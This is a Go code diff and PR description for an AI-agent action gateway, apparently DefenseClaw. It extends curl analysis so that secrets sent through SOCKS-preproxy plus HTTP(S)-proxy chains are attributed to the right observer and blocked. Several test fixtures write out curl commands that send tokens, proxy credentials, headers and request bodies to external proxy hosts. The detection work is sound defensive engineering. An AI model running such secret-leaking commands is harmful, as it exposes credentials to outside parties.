+				"--proxy-header", "X-Proxy: tok",
+				"http://origin.example/",
+			},
+			rejectValues: []string{"user:pass", "other:secret", "X-Proxy: tok"},
+			observer:     "ext.example",
+		},
+	} {
+		test := test
+		t.Run(test.name, func(t *testing.T) {
+			t.Parallel()
+			facts := Analyze(Input{Tool: "exec", Argv: test.argv})
+			if len(facts.Commands) != 1 {
+				t.Fatalf("commands = %#v", facts.Commands)
+			}
+			command := facts.Commands[0]
+			requests := staticCurlPreproxyPlaintextHTTPRequestComponents(command)
+			hasPreproxyValue := func(value string) bool {
+				for _, request := range requests {
+					if request.Value == value &&
+						request.Host == test.observer && request.Scheme == "tcp" {
+						return true
+					}
+				}
+				return false
+			}
+			for _, value := range test.wantValues {
+				if !hasPreproxyValue(value) {
+					t.Fatalf("requests = %#v, want %q on %q", requests, value, test.observer)
+				}
+			}
+			for _, candidate := range staticCurlHTTPProxyTransmittedMetadata(command).ProxyRequestComponents {
+				if candidate.Value == "" {
+					continue
+				}
+				if chain, _, ok := staticCurlHTTPProxyChainRoute(command); ok &&
+					chain.DownstreamPlaintext && !hasPreproxyValue(candidate.Value) {
+					t.Fatalf("main-proxy component %q missing on preproxy: %#v",
+						candidate.Value, requests)
+				}
+			}
+			for _, value := range test.rejectValues {
+				if hasPreproxyValue(value) {
+					t.Fatalf("component %q leaked onto SOCKS: %#v", value, requests)
 				}
 			}
 		})

--- a/internal/actionfacts/curl_http_proxy_chain_test.go
+++ b/internal/actionfacts/curl_http_proxy_chain_test.go
@@ -207,11 +207,22 @@ func TestStaticCurlPreproxyObserverComponents(t *testing.T) {
 			wantObserver: "preproxy.example",
 		},
 		{
-			name: "Host override does not copy origin hostname onto SOCKS5",
+			name: "Host override still copies forward-proxy origin hostname onto SOCKS5",
 			argv: []string{
 				"curl", "--preproxy", "socks5://preproxy.example",
 				"--proxy", "http://proxy.example", "--header",
 				"Host: other.example", "http://origin.example/",
+			},
+			wantHost:     "origin.example",
+			wantRequest:  "Host: other.example",
+			wantObserver: "preproxy.example",
+		},
+		{
+			name: "request-target plus Host override hides origin hostname from SOCKS5",
+			argv: []string{
+				"curl", "--preproxy", "socks5://preproxy.example",
+				"--proxy", "http://proxy.example", "--request-target", "/decoy",
+				"--header", "Host: other.example", "http://origin.example/",
 			},
 			rejectHost:   "origin.example",
 			wantRequest:  "Host: other.example",

--- a/internal/actionfacts/curl_proxy_metadata_test.go
+++ b/internal/actionfacts/curl_proxy_metadata_test.go
@@ -596,11 +596,14 @@ func TestStaticCurlProxyTransmittedMetadata(t *testing.T) {
 			},
 		},
 		{
-			name: "preproxy changes first peer", argv: []string{
+			name: "preproxy plus HTTPS proxy keeps credentials on the main proxy",
+			argv: []string{
 				"curl", "--preproxy", "socks5://first.example", "--proxy",
 				"https://proxy.example", "--proxy-user", "proxy:" + token,
 				"https://origin.example",
 			},
+			want:              components("https", "proxy.example", 443, "proxy:"+token),
+			wantAuthoritative: true,
 		},
 		{
 			name: "SOCKS proxy credentials use their own metadata lane", argv: []string{

--- a/internal/actionfacts/curl_socks_proxy_credentials_test.go
+++ b/internal/actionfacts/curl_socks_proxy_credentials_test.go
@@ -482,12 +482,33 @@ func TestStaticCurlSOCKSProxyCredentialComponents(t *testing.T) {
 			},
 		},
 		{
-			name: "SOCKS preproxy chain uses a separate credential namespace",
+			name: "HTTP chain sends preproxy URL credentials to SOCKS peer",
 			argv: []string{
 				"curl", "--preproxy", "socks5h://pre:" + token + "@first.example",
 				"--proxy", "http://proxy.example", "--proxy-user", "main:safe",
 				"https://origin.example",
 			},
+			want:              components("first.example", 1080, "pre", token),
+			wantAuthoritative: true,
+		},
+		{
+			name: "HTTP chain does not give main proxy user to preproxy",
+			argv: []string{
+				"curl", "--preproxy", "socks5h://pre:safe@first.example",
+				"--proxy", "http://proxy.example", "--proxy-user", "main:" + token,
+				"https://origin.example",
+			},
+			want:              components("first.example", 1080, "pre", "safe"),
+			wantAuthoritative: true,
+		},
+		{
+			name: "HTTP chain without preproxy URL credentials has no SOCKS fields",
+			argv: []string{
+				"curl", "--preproxy", "socks5h://first.example",
+				"--proxy", "http://proxy.example", "--proxy-user", "main:" + token,
+				"https://origin.example",
+			},
+			wantAuthoritative: true,
 		},
 		{
 			name: "FTP chain sends preproxy URL credentials to SOCKS peer",

--- a/internal/actionfacts/web_transfer_parsed_classify.go
+++ b/internal/actionfacts/web_transfer_parsed_classify.go
@@ -2165,18 +2165,31 @@ func StaticCurlProxyUploadPayloads(
 	command CommandFact,
 ) []TransmittedRequestComponent {
 	proxy, parsed, ok := staticCurlProxyDestination(command)
-	if !ok || proxy.Scheme != "http" && proxy.Scheme != "https" &&
-		proxy.Scheme != "tcp" {
-		return nil
+	observers := []NetworkFact(nil)
+	if ok && (proxy.Scheme == "http" || proxy.Scheme == "https" ||
+		proxy.Scheme == "tcp") {
+		if proxy.Scheme == "tcp" && !staticCurlHostnameFirstWireSetupValid(
+			command,
+			parsed,
+			parsed.Targets[0].Group,
+		) {
+			// The SOCKS relay can observe an HTTP body only after curl completes
+			// local setup and reaches the proxy. Keep this new observer lane on the
+			// same conservative first-wire boundary as SOCKS request metadata.
+			return nil
+		}
+		observers = []NetworkFact{proxy}
+	} else if chain, chainParsed, chainOK := staticCurlHTTPProxyChainRoute(command); chainOK {
+		parsed = chainParsed
+		observers = []NetworkFact{chain.MainProxy}
+		if chain.DownstreamPlaintext &&
+			staticCurlHostnameFirstWireSetupValid(
+				command, parsed, parsed.Targets[0].Group,
+			) {
+			observers = append(observers, chain.Preproxy)
+		}
 	}
-	if proxy.Scheme == "tcp" && !staticCurlHostnameFirstWireSetupValid(
-		command,
-		parsed,
-		parsed.Targets[0].Group,
-	) {
-		// The SOCKS relay can observe an HTTP body only after curl completes
-		// local setup and reaches the proxy. Keep this new observer lane on the
-		// same conservative first-wire boundary as SOCKS request metadata.
+	if len(observers) == 0 {
 		return nil
 	}
 	hasHTTPOrigin := false
@@ -2213,14 +2226,16 @@ func StaticCurlProxyUploadPayloads(
 	if len(payloads) == 0 {
 		return nil
 	}
-	components := make([]TransmittedRequestComponent, 0, len(payloads))
-	for _, payload := range payloads {
-		components = append(components, TransmittedRequestComponent{
-			Value:  payload,
-			Scheme: proxy.Scheme,
-			Host:   proxy.Host,
-			Port:   proxy.Port,
-		})
+	components := make([]TransmittedRequestComponent, 0, len(payloads)*len(observers))
+	for _, observer := range observers {
+		for _, payload := range payloads {
+			components = append(components, TransmittedRequestComponent{
+				Value:  payload,
+				Scheme: observer.Scheme,
+				Host:   observer.Host,
+				Port:   observer.Port,
+			})
+		}
 	}
 	return components
 }
@@ -2445,6 +2460,9 @@ func staticCurlHTTPProxyTransmittedMetadata(
 	command CommandFact,
 ) CurlProxyTransmittedMetadata {
 	proxy, parsed, ok := staticCurlProxyDestination(command)
+	if !ok {
+		proxy, parsed, ok = staticCurlHTTPProxyChainDestination(command)
+	}
 	if !ok || proxy.Scheme != "http" && proxy.Scheme != "https" {
 		return CurlProxyTransmittedMetadata{}
 	}
@@ -2735,6 +2753,14 @@ func StaticCurlProxyTransmittedMetadata(
 		metadata.ProxyRequestComponents,
 		staticCurlFTPProxyRequestComponents(command)...,
 	)
+	metadata.ProxyDestinationHostnameComponents = append(
+		metadata.ProxyDestinationHostnameComponents,
+		staticCurlPreproxyDestinationHostnameComponents(command)...,
+	)
+	metadata.ProxyRequestComponents = append(
+		metadata.ProxyRequestComponents,
+		staticCurlPreproxyPlaintextHTTPRequestComponents(command)...,
+	)
 	return metadata
 }
 
@@ -3007,8 +3033,8 @@ func curlTargetUsesExplicitProxy(parsed curlArgvParse, target curlTransferTarget
 // enabled and selected by the server.
 //
 // The shared destination proof owns direct HTTP(S)/FTP(S) routes and a sole
-// SOCKS preproxy. A separately closed FTP route owns the two-hop
-// SOCKS-preproxy + HTTP-main case: --proxy-user belongs to the main HTTP proxy,
+// SOCKS preproxy. Separately closed FTP and HTTP(S) two-hop routes own
+// SOCKS-preproxy + HTTP-main: --proxy-user belongs to the main HTTP proxy,
 // while only URL credentials belong to that SOCKS preproxy.
 func StaticCurlSOCKSProxyCredentialComponents(
 	command CommandFact,
@@ -3020,6 +3046,10 @@ func StaticCurlSOCKSProxyCredentialComponents(
 	if !ok {
 		proxy, parsed, chainGroup, chainProxyIndex, chainProxyCanonical, ok =
 			staticCurlFTPSOCKSPreproxyCredentialRoute(command)
+	}
+	if !ok {
+		proxy, parsed, chainGroup, chainProxyIndex, chainProxyCanonical, ok =
+			staticCurlHTTPSOCKSPreproxyCredentialRoute(command)
 	}
 	if !ok || proxy.Scheme != "tcp" || len(command.Redirects) != 0 ||
 		command.PipelineID != 0 || len(parsed.Targets) == 0 {
@@ -3219,6 +3249,30 @@ func staticCurlFTPSOCKSPreproxyCredentialRoute(
 		return empty()
 	}
 	return route.Networks[0], parsed, group, lastPreproxy, "--proxy", true
+}
+
+func staticCurlHTTPSOCKSPreproxyCredentialRoute(
+	command CommandFact,
+) (NetworkFact, curlArgvParse, int, int, string, bool) {
+	empty := func() (NetworkFact, curlArgvParse, int, int, string, bool) {
+		return NetworkFact{}, curlArgvParse{}, 0, -1, "", false
+	}
+	chain, parsed, ok := staticCurlHTTPProxyChainRoute(command)
+	if !ok || command.PipelineID != 0 || len(parsed.Targets) == 0 {
+		return empty()
+	}
+	group := parsed.Targets[0].Group
+	lastPreproxy := -1
+	for index, option := range parsed.Options {
+		if option.Group == group && option.Canonical == "--preproxy" {
+			lastPreproxy = index
+		}
+	}
+	if lastPreproxy < 0 ||
+		!curlExplicitSOCKSProxyURL(parsed.Options[lastPreproxy].Value) {
+		return empty()
+	}
+	return chain.Preproxy, parsed, group, lastPreproxy, "--proxy", true
 }
 
 // StaticCurlSOCKSProxyCredentialComponentsForFacts admits an exactly isolated
@@ -4204,6 +4258,12 @@ func StaticCurlTransmittedMetadata(command CommandFact) CurlTransmittedMetadata 
 		return CurlTransmittedMetadata{}
 	}
 	explicitProxy, _, explicitProxyValid := staticCurlProxyDestination(command)
+	if !explicitProxyValid {
+		if chain, _, chainOK := staticCurlHTTPProxyChainRoute(command); chainOK {
+			explicitProxy = chain.Preproxy
+			explicitProxyValid = true
+		}
+	}
 	allTargetsTunnelled := false
 	if explicitProxyValid {
 		proxyTunnel := curlProxyTunnelEnabled(parsed, group)
@@ -4244,7 +4304,8 @@ func StaticCurlTransmittedMetadata(command CommandFact) CurlTransmittedMetadata 
 		if option.Role == curlOptionNetworkOverride &&
 			(!explicitProxyValid || !allTargetsTunnelled ||
 				!curlMainProxyOption(option.Canonical) &&
-					option.Canonical != "--noproxy") {
+					option.Canonical != "--noproxy" &&
+					option.Canonical != "--preproxy") {
 			return CurlTransmittedMetadata{}
 		}
 		if option.Canonical == "--user" && option.ValuePresent {
@@ -8502,19 +8563,19 @@ func classifyParsedCurlTransfer(out *parseOutput, command *CommandFact) {
 		}
 	}
 	proxyNetwork, _, proxyProved := staticCurlProxyDestination(proxyCommand)
-	if !proxyProved {
-		if socksProxy, _, socksProved := staticCurlSOCKSProxyDestinationWithUploads(proxyCommand); socksProved {
-			proxyNetwork = socksProxy
-			proxyProved = true
-		}
-	}
 	proxyNetworks := []NetworkFact(nil)
 	proxyRoutingProved := make(map[int]bool)
 	if proxyProved {
 		proxyNetworks = append(proxyNetworks, proxyNetwork)
-		if len(parsed.Targets) > 0 {
-			proxyRoutingProved[parsed.Targets[0].Group] = true
-		}
+	} else if chainNetworks := curlHTTPProxyChainNetworks(proxyCommand); len(chainNetworks) != 0 {
+		proxyNetworks = append(proxyNetworks, chainNetworks...)
+		proxyProved = true
+	} else if socksProxy, _, socksProved := staticCurlSOCKSProxyDestinationWithUploads(proxyCommand); socksProved {
+		proxyNetworks = append(proxyNetworks, socksProxy)
+		proxyProved = true
+	}
+	if proxyProved && len(parsed.Targets) > 0 {
+		proxyRoutingProved[parsed.Targets[0].Group] = true
 	}
 	if !proxyProved && len(parsed.Targets) > 0 {
 		groups := make(map[int]struct{})

--- a/internal/gateway/trusted_action_context_disposition_test.go
+++ b/internal/gateway/trusted_action_context_disposition_test.go
@@ -1292,14 +1292,13 @@ func TestTrustedActionRequestMetadataRiskPairs(t *testing.T) {
 			},
 		},
 		{
-			name:    "SOCKS5 preproxy plus Host override hides origin hostname",
+			name:    "SOCKS5 preproxy plus Host override still observes origin hostname",
 			program: "curl",
 			argv: []string{
 				"--preproxy", "socks5://preproxy.example",
 				"--proxy", "http://127.0.0.1", "--header", "Host: safe.example",
 				"http://" + trustedActionDispositionTestToken + ".localhost/safe",
 			},
-			wantAudit: true,
 		},
 		{
 			name:    "HTTPS main proxy hides origin hostname from SOCKS5h",

--- a/internal/gateway/trusted_action_context_disposition_test.go
+++ b/internal/gateway/trusted_action_context_disposition_test.go
@@ -1283,6 +1283,117 @@ func TestTrustedActionRequestMetadataRiskPairs(t *testing.T) {
 			wantAudit: true,
 		},
 		{
+			name:    "SOCKS5h preproxy observes HTTP origin hostname through HTTP main",
+			program: "curl",
+			argv: []string{
+				"--preproxy", "socks5h://preproxy.example",
+				"--proxy", "http://127.0.0.1",
+				"http://" + trustedActionDispositionTestToken + ".localhost/safe",
+			},
+		},
+		{
+			name:    "SOCKS5 preproxy plus Host override hides origin hostname",
+			program: "curl",
+			argv: []string{
+				"--preproxy", "socks5://preproxy.example",
+				"--proxy", "http://127.0.0.1", "--header", "Host: safe.example",
+				"http://" + trustedActionDispositionTestToken + ".localhost/safe",
+			},
+			wantAudit: true,
+		},
+		{
+			name:    "HTTPS main proxy hides origin hostname from SOCKS5h",
+			program: "curl",
+			argv: []string{
+				"--preproxy", "socks5h://preproxy.example",
+				"--proxy", "https://127.0.0.1",
+				"https://" + trustedActionDispositionTestToken + ".localhost/safe",
+			},
+			wantAudit: true,
+		},
+		{
+			name:    "SOCKS5h preproxy observes plaintext HTTP header through HTTP main",
+			program: "curl",
+			argv: []string{
+				"--preproxy", "socks5h://preproxy.example",
+				"--proxy", "http://127.0.0.1", "--header",
+				"X-Key: " + trustedActionDispositionTestToken,
+				"http://safe.localhost/upload",
+			},
+		},
+		{
+			name:    "HTTPS main proxy hides origin header from SOCKS5h",
+			program: "curl",
+			argv: []string{
+				"--preproxy", "socks5h://preproxy.example",
+				"--proxy", "https://127.0.0.1", "--header",
+				"X-Key: " + trustedActionDispositionTestToken,
+				"http://safe.localhost/upload",
+			},
+			wantAudit: true,
+		},
+		{
+			name:    "SOCKS5h preproxy observes plaintext HTTP body through HTTP main",
+			program: "curl",
+			argv: []string{
+				"--preproxy", "socks5h://preproxy.example",
+				"--proxy", "http://127.0.0.1", "--data-raw",
+				trustedActionDispositionTestToken, "http://safe.localhost/upload",
+			},
+		},
+		{
+			name:    "HTTPS main proxy hides origin body from SOCKS5h",
+			program: "curl",
+			argv: []string{
+				"--preproxy", "socks5h://preproxy.example",
+				"--proxy", "https://127.0.0.1", "--data-raw",
+				trustedActionDispositionTestToken, "http://safe.localhost/upload",
+			},
+			wantAudit: true,
+		},
+		{
+			name:    "SOCKS5h preproxy observes HTTP main-proxy hostname",
+			program: "curl",
+			argv: []string{
+				"--preproxy", "socks5h://preproxy.example",
+				"--proxy", "http://" + trustedActionDispositionTestToken + ".proxy.example",
+				"http://safe.localhost/safe",
+			},
+		},
+		{
+			name:    "locally resolving SOCKS5 does not receive HTTP main hostname",
+			program: "curl",
+			argv: []string{
+				"--preproxy", "socks5://preproxy.example",
+				"--proxy", "http://" + trustedActionDispositionTestToken + ".proxy.example",
+				"--header", "Host: safe.example",
+				"http://safe.localhost/safe",
+			},
+			wantAudit: true,
+		},
+		{
+			name:    "matching noproxy bypasses HTTP proxy chain observers",
+			program: "curl",
+			argv: []string{
+				"--preproxy", "socks5h://preproxy.example",
+				"--proxy", "http://proxy.example", "--noproxy", "safe.localhost",
+				"--header", "X-Key: " + trustedActionDispositionTestToken,
+				"http://safe.localhost/upload",
+			},
+			wantAudit: true,
+		},
+		{
+			name:    "mixed later transfer group closes HTTP proxy chain",
+			program: "curl",
+			argv: []string{
+				"--preproxy", "socks5h://preproxy.example",
+				"--proxy", "http://127.0.0.1", "--header",
+				"X-Key: " + trustedActionDispositionTestToken,
+				"http://safe.localhost/upload", "--next", "https://two.example/",
+			},
+			wantAudit: true,
+		},
+		{
 			name: "external Wget HTTPS destination hostname", program: "wget",
 			argv: []string{
 				"--no-config",

--- a/internal/gateway/trusted_action_curl_proxy_metadata_test.go
+++ b/internal/gateway/trusted_action_curl_proxy_metadata_test.go
@@ -422,10 +422,17 @@ func TestTrustedActionCurlProxyMetadataEgress(t *testing.T) {
 				token + " //origin.example/path",
 		},
 		{
-			name: "preproxy changes first peer",
+			name: "preproxy plus HTTPS proxy keeps credentials on the main proxy",
 			command: "curl --preproxy socks5://first.example --proxy " +
 				"https://proxy.example --proxy-user proxy:" + token +
 				" https://origin.example",
+			wantEnforce: true,
+		},
+		{
+			name: "HTTP chain proxy user stays on a local main proxy",
+			command: "curl --preproxy socks5h://first.example --proxy " +
+				"http://127.0.0.1 --proxy-user proxy:" + token +
+				" http://origin.example/",
 		},
 		{
 			name: "SOCKS proxy credentials use their own metadata lane",

--- a/internal/gateway/trusted_action_curl_proxy_metadata_test.go
+++ b/internal/gateway/trusted_action_curl_proxy_metadata_test.go
@@ -429,10 +429,11 @@ func TestTrustedActionCurlProxyMetadataEgress(t *testing.T) {
 			wantEnforce: true,
 		},
 		{
-			name: "HTTP chain proxy user stays on a local main proxy",
+			name: "HTTP chain proxy user reaches the external preproxy",
 			command: "curl --preproxy socks5h://first.example --proxy " +
 				"http://127.0.0.1 --proxy-user proxy:" + token +
 				" http://origin.example/",
+			wantEnforce: true,
 		},
 		{
 			name: "SOCKS proxy credentials use their own metadata lane",

--- a/internal/gateway/trusted_action_curl_socks_credentials_test.go
+++ b/internal/gateway/trusted_action_curl_socks_credentials_test.go
@@ -155,6 +155,12 @@ func TestEvaluateCodexHookCurlSOCKSProxyCredentialEgress(t *testing.T) {
 			wantBlock: true,
 		},
 		{
+			name: "HTTP chain sends preproxy URL credentials",
+			command: "curl --preproxy socks5h://pre:" + key +
+				"@first.example --proxy http://main.example https://origin.example",
+			wantBlock: true,
+		},
+		{
 			name: "FTP chain sends preproxy URL credentials",
 			command: "curl --preproxy socks5h://pre:" + key +
 				"@first.example --proxy http://main.example ftp://127.0.0.1/file",


### PR DESCRIPTION
Stacked on top of #842 (`fix/curl-socks-upload-observers`). Review/merge that PR first; this PR's base is the stack parent, not `main`.

Fixes #773.

## Problem

DefenseClaw left HTTP(S) curl transfers that use `--preproxy SOCKS` plus `--proxy HTTP(S)` non-authoritative. The two-hop route was already modeled for FTP, but HTTP(S) could not pair origin authority, CONNECT/SNI, credentials, or plaintext request bytes with the hop that actually observes them.

## Current Situation

PR #755 closed direct HTTP(S) proxy, direct SOCKS, CONNECT, SNI, and plaintext SOCKS observer cases. `staticCurlProxyDestination` still rejects `lastProxy && lastPreproxy`, so classify marked `--preproxy`/`--proxy` as `unsupported_construct` and `--proxy-user` could not stay on the main HTTP(S) proxy. FTP already owns this chain with separate credential namespaces; HTTP(S) did not.

## Solution

Parse the exact `--preproxy SOCKS` plus `--proxy HTTP(S)` route and materialize both physical peers.

- SOCKS4a/5h transmit the main-proxy hostname; locally resolving SOCKS4/5 do not.
- When the main proxy is HTTP, SOCKS also observes plaintext origin Host/SNI, headers, and inline bodies.
- When the main proxy is HTTPS, those origin bytes stay inside TLS to the main proxy.
- `--proxy-user` binds to the main HTTP(S) proxy; only preproxy URL credentials bind to SOCKS.
- `--noproxy`, mixed `--next` groups, config/env-derived routes, HTTP preproxies, SOCKS4+IPv6 main, and pre-connect setup failures stay detection-only.
- Same-rule gateway checks correlate each value only with the exact external `NetworkConnect` observer.

```
curl --preproxy socks5h://preproxy --proxy http://main --header "X-Key: SECRET" http://origin/
        │
        ├─ SOCKS NetworkConnect preproxy
        │    sees main hostname, origin Host/header/body
        └─ HTTP NetworkConnect main
             sees --proxy-user, origin hostname, header/body
```

## What Changed (Where & How)

| File | Summary |
| --- | --- |
| `internal/actionfacts/curl_http_proxy_chain.go` | Two-hop route, dual `NetworkConnect` facts, preproxy hostname/request projectors |
| `internal/actionfacts/curl_http_proxy_chain_test.go` | SOCKS4/4a/5/5h, HTTP/HTTPS main and origin, noproxy, mixed-group, body pairing |
| `internal/actionfacts/web_transfer_parsed_classify.go` | Classify both peers; HTTP metadata and SOCKS credentials reuse the chain; inline bodies bind to the observing hops |
| `internal/actionfacts/curl_proxy_metadata_test.go` | `--proxy-user` stays on the HTTPS main proxy |
| `internal/actionfacts/curl_socks_proxy_credentials_test.go` | HTTP-chain preproxy URL credentials stay SOCKS-owned |
| `internal/gateway/trusted_action_context_disposition_test.go` | Same-rule enforce/audit pairs for each hop |
| `internal/gateway/trusted_action_curl_proxy_metadata_test.go` | Main-proxy credential enforcement through the chain |
| `internal/gateway/trusted_action_curl_socks_credentials_test.go` | HTTP-chain preproxy URL credential enforcement |

## Breaking Changes

Authoritative action-mode now blocks HTTP(S) curl commands that send proven secrets through this two-hop route to an external observer. Previously those commands were detection-only.

## Open Issues / Follow-ups

- #774 - plaintext HTTP-after-CONNECT metadata onto the proxy observer
- #770 - curl capability facts for HTTPS-proxy hostname authority

## Test Plan

```
go test ./internal/actionfacts/ -count=1 -timeout 180s \
  -run 'TestStaticCurlHTTPProxyChain|TestStaticCurlPreproxy|TestStaticCurlProxyTransmittedMetadata$|TestStaticCurlSOCKSProxyCredentialComponents$'
```

Observed: `ok`

```
go test ./internal/gateway/ -count=1 -timeout 180s \
  -run 'TestTrustedActionCurlProxyMetadataEgress|TestEvaluateCodexHookCurlSOCKSProxyCredentialEgress|TestTrustedActionRequestMetadataRiskPairs'
```

Observed: `ok`